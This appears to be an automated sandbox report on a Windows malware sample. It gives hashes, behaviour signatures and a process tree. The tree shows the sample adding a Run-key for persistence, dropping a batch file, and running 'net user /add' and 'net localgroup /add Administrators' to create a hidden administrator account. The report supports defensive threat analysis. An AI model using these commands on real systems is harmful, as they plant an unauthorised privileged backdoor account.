Analysis
-
max time kernel
141s -
max time network
122s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
03/02/2024, 00:18
Static task
static1
Behavioral task
behavioral1
Sample
8ae7bb9d6119c991386fa9ed8149c33e.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
8ae7bb9d6119c991386fa9ed8149c33e.exe
Resource
win10v2004-20231222-en
General
-
Target
8ae7bb9d6119c991386fa9ed8149c33e.exe
-
Size
54KB
-
MD5
8ae7bb9d6119c991386fa9ed8149c33e
-
SHA1
2647ea011d14a51443c4e83c85e64124ab166d31
-
SHA256
87d19e3bff436f6d204095917f7a2b1dd58d093d637b8cc0a6aa38b761832241
-
SHA512
5239f922e773828896c6bfb98ec0cf1bc9688eadb3e858fa27cb71ed2f691d5e0ada63b8b14ab65139046d887d168f540e8062ff9fdea562cb0db980fc656a21
-
SSDEEP
1536:ts+Zgajv3kHK35Y0RKsZ1Ls3JcBHHx/KboFwbQp8X:tFC4kq35Yds/Ls3JcBnAFby8
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 8ae7bb9d6119c991386fa9ed8149c33e.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows System Configuration = "C:\\Windows\\SYSCFG16.EXE" 8ae7bb9d6119c991386fa9ed8149c33e.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\SYSCFG16.EXE 8ae7bb9d6119c991386fa9ed8149c33e.exe File opened for modification C:\Windows\SYSCFG16.EXE 8ae7bb9d6119c991386fa9ed8149c33e.exe File created C:\Windows\temp.bat 8ae7bb9d6119c991386fa9ed8149c33e.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 4696 wrote to memory of 380 4696 8ae7bb9d6119c991386fa9ed8149c33e.exe 96 PID 4696 wrote to memory of 380 4696 8ae7bb9d6119c991386fa9ed8149c33e.exe 96 PID 4696 wrote to memory of 380 4696 8ae7bb9d6119c991386fa9ed8149c33e.exe 96 PID 380 wrote to memory of 1200 380 cmd.exe 98 PID 380 wrote to memory of 1200 380 cmd.exe 98 PID 380 wrote to memory of 1200 380 cmd.exe 98 PID 1200 wrote to memory of 2540 1200 net.exe 99 PID 1200 wrote to memory of 2540 1200 net.exe 99 PID 1200 wrote to memory of 2540 1200 net.exe 99 PID 380 wrote to memory of 3460 380 cmd.exe 100 PID 380 wrote to memory of 3460 380 cmd.exe 100 PID 380 wrote to memory of 3460 380 cmd.exe 100 PID 3460 wrote to memory of 1660 3460 net.exe 101 PID 3460 wrote to memory of 1660 3460 net.exe 101 PID 3460 wrote to memory of 1660 3460 net.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\8ae7bb9d6119c991386fa9ed8149c33e.exe"C:\Users\Admin\AppData\Local\Temp\8ae7bb9d6119c991386fa9ed8149c33e.exe"1⤵
- Checks computer location settings
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4696 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\temp.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Windows\SysWOW64\net.exenet user /add System hakt3⤵
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user /add System hakt4⤵PID:2540
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup /add Administrators System3⤵
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup /add Administrators System4⤵PID:1660
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
89B
MD5dccbf9e7aa8e5e8a7d44c634aa4b3e8a
SHA1a2e14c86d1a890f37afe11e0ef02f3b5f05cf3c3
SHA256554c21f981ac2139afa84e5af335c54fce3e0b05db145abef9eb7b2c23612398
SHA5128581f237ce5a9df85ebee9f23fe56f6f27d37c6ea66e9c40cd73b6b85487b6e915f83e5a2740eabed7cd2133c6dca46bd062c5429e2223904ffd9aaff09c8e28